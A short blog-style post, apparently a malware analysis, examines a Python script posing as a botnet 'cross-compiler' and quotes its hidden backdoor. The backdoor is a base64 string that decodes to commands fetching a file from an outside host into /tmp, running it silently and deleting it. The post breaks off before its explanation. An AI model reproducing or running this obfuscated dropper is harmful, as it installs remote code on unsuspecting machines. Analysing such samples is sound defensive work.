Scanning for Scanners
Recently, a malicious Python script claiming to be a “cross-compiler” for things like Mirai was brought to my attention. I decided I would look into such a thing as it seemed odd that someone would spread malware that way.
Upon analyzation of the script, I came across this beautiful snippet:
checkbinaries = "Y2QgL3RtcDsgd2dldCAtcSBodHRwOi8vc3Vja215YXNzLmdhLy54ICA7ICBjdXJsIC1PIGh0dHA6Ly9zdWNrbXlhc3MuZ2EvLnggIDtjaG1vZCAreCAueDsgbm9odXAgLi8ueCA8L2Rldi9udWxsID4vZGV2L251bGwgMj4mMTtybSAtcmYgLng=" rebinaries = str(base64.b64decode(checkbinaries)) run(rebinaries) Ah yes, what a great little backdoor! Let’s see what that base64 translates to…
Read more ...